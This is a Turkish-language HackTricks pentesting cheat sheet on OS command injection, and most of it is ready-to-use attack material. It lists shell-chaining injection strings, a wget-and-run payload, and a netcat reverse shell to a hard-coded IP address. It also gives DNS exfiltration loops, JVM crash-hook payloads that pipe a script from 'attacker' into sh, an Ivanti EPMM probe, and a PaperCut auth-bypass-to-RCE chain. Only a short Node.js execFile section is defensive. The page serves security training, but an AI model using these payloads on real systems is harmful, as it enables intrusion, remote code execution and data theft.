Command Injection

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

command Injection nedir?

Bir command injection, bir saldırganın uygulamayı barındıran sunucuda rastgele işletim sistemi komutları çalıştırmasına izin verir. Sonuç olarak, uygulama ve tüm verileri tamamen ele geçirilebilir. Bu komutların çalıştırılması genellikle saldırganın uygulamanın çalışma ortamı ve alttaki sistem üzerinde yetkisiz erişim veya kontrol elde etmesine olanak tanır.

Bağlam

Girdinizin nereye enjekte edildiğine bağlı olarak, komutlardan önce alıntılanmış bağlamı sonlandırmanız (using " or ') gerekebilir.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

Bir linux makinesi içinde keyfi komutlar çalıştırmaya çalışıyorsanız, bu Bypasses hakkında okumak ilginizi çekecektir:

Bypass Linux Restrictions

Örnekler

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Bash aritmetik değerlendirmesi RewriteMap/CGI-style scriptlerinde

RewriteMap için yazılmış bash yardımcı programları bazen sorgu parametrelerini global değişkenlere atar ve daha sonra bunları aritmetik bağlamlarda karşılaştırır ([[ $a -gt $b ]], $((...)), let). Aritmetik genişleme içeriği yeniden tokenleştirir, bu yüzden saldırgan kontrollü değişken adları veya dizi referansları iki kez genişletilir ve çalıştırılabilir.

Ivanti EPMM RewriteMap yardımcılarında görülen örüntü:

  1. Parametreler globale eşlenir (stgStartTime, htheValue).
  2. Daha sonra kontrol:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
...
fi
  1. st=theValue gönderin, böylece gStartTime theValue string’ine işaret eder.
  2. h=gPath['sleep 5'] gönderin, böylece theValue bir dizi indeksi içerir; aritmetik kontrolde sleep 5 çalışır (gerçek bir payload ile değiştirin).

Probe (~5s gecikme, zafiyetse 404 döner):

curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"

Notlar:

  • Aynı yardımcıyı diğer önekler altında arayın (ör. /mifs/c/aftstore/fob/).
  • Aritmetik bağlamlar bilinmeyen token’ları değişken/dizi tanımlayıcıları olarak kabul eder; bu yüzden bu basit metacharacter filtrelerini atlatır.

Parametreler

İşte code injection ve benzeri RCE vulnerabilities’e açık olabilecek ilk 25 parametre (kaynak: link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Veri çıkarma: karakter karakter

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

https://github.com/HoLyVieR/dnsbin adresindeki araca dayanır; ayrıca dnsbin.zhack.ca adresinde barındırılmaktadır.

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

DNS based data exfiltration’i kontrol etmek için çevrimiçi araçlar:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

JavaScript/TypeScript back-end’leri denetlerken sıkça Node.js child_process API’siyle karşılaşırsınız.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() bir shell (/bin/sh -c) başlatır, bu nedenle shell için özel anlamı olan herhangi bir karakter (back-ticks, ;, &&, |, $(), …) kullanıcı girdisi string içinde birleştirildiğinde command injection ile sonuçlanır.

Önlem: execFile() (veya spawn() (shell seçeneği olmadan)) kullanın ve her argümanı ayrı bir dizi öğesi olarak sağlayın ki herhangi bir shell devreye girmesin:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Gerçek dünya vakası: Synology Photos ≤ 1.7.0-0794, kimlik doğrulaması gerektirmeyen bir WebSocket olayı yoluyla sömürülebiliyordu; bu olay saldırgan kontrollü veriyi id_user içine yerleştiriyor ve daha sonra bir exec() çağrısına gömülüyordu, bu sayede RCE elde edildi (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Tüm injections shell metacharacters gerektirmez. Uygulama, güvensiz dizeleri bir sistem aracına argüman olarak geçiriyorsa (hatta execve/execFile kullanıp shell olmadan bile), birçok program - veya -- ile başlayan herhangi bir argümanı yine de bir seçenek olarak yorumlar. Bu, saldırganın modları değiştirmesine, çıktı yollarını değiştirmesine veya tehlikeli davranışları tetiklemesine izin verir; üstelik hiç shell’e girmeden.

Tipik görüldüğü yerler:

  • Gömülü web arayüzleri/CGI handler’ları, ping <user>, tcpdump -i <iface> -w <file>, curl <url> gibi komutlar oluştururken.
  • Merkezi CGI yönlendiricileri (örn. /cgi-bin/<something>.cgi içinde topicurl=<handler> gibi bir selector parametresi) — burada birden fazla handler aynı zayıf doğrulayıcıyı tekrar kullanır.

Ne denenmeli:

  • Alt araca seçenek olarak tüketilmesi için -/-- ile başlayan değerler sağlayın.
  • Davranışı değiştiren veya dosya yazan seçenekleri suistimal edin, örneğin:
  • ping: -f/-c 100000 ile cihazı zorlayın (DoS)
  • curl: -o /tmp/x ile arbitrary path’lere yazma, -K <url> ile saldırgan kontrollü config yükleme
  • tcpdump: -G 1 -W 1 -z /path/script.sh ile post-rotate execution elde etme (unsafe wrappers içinde)
  • Program -- (end-of-options) destekliyorsa, --’ü yanlış yere ekleyen naif mitigasyonları atlatmayı deneyin.

Merkezi CGI yönlendiricilerine karşı genel PoC şekilleri:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM tanılama geri çağrıları ile garantili exec

JVM komut satırı argümanlarını enjekte etmenize izin veren herhangi bir primitive (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) uygulama bytecode’una dokunmadan güvenilir bir RCE’ye dönüştürülebilir:

  1. Metaspace veya heap’i küçülterek deterministik bir çökme zorlayın: -XX:MaxMetaspaceSize=16m (veya küçük bir -Xmx). Bu, erken bootstrap sırasında bile bir OutOfMemoryError garanti eder.
  2. Bir hata kancası iliştirin: -XX:OnOutOfMemoryError="<cmd>" veya -XX:OnError="<cmd>" JVM her sonlandırıldığında rastgele bir işletim sistemi komutu çalıştırır.
  3. Gerekirse kurtarma girişimlerini önlemek ve payload’ı tek seferlik tutmak için -XX:+CrashOnOutOfMemoryError ekleyin.

Örnek payload’lar:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see Localhost WebSocket abuse) therefore translate directly into OS command execution.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • Etkilenen NG/MF build’leri (örn., 22.0.5 Build 63914) /app?service=page/SetupCompleted yolunu açığa çıkarır; oraya göz atıp Login’e tıklamak kimlik bilgisi olmadan geçerli bir JSESSIONID döndürür (kurulum akışında authentication bypass).
  • Options → Config Editor içinde print-and-device.script.enabled=Y ve print.script.sandboxed=N olarak ayarlayın; bu, printer scripting’i açar ve sandbox’ı devre dışı bırakır.
  • Yazıcı Scripting sekmesinde script’i etkinleştirin ve doğrulama hatalarını önlemek için printJobHook’u tanımlı tutun, ancak payload’u fonksiyonun dışına yerleştirin ki Apply’e tıkladığınızda hemen çalışsın (herhangi bir print job gerekmez):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Horizon3’ün CVE-2023-27350.py auth bypass, config flips, command execution ve rollback işlemlerini otomatikleştirir — servis yalnızca dahili olarak erişilebiliyorsa, bunu bir upstream proxy (ör. proxychains → Squid) üzerinden çalıştırın.
  • Callback’i bir reverse shell ile değiştirin; eğer UI/PoC pipes/redirects’ı işleyemiyorsa, payload’u tek bir komutla hazırlayıp ikinci bir request ile çalıştırın.

Brute-Force Tespit Listesi

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt

Referanslar

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin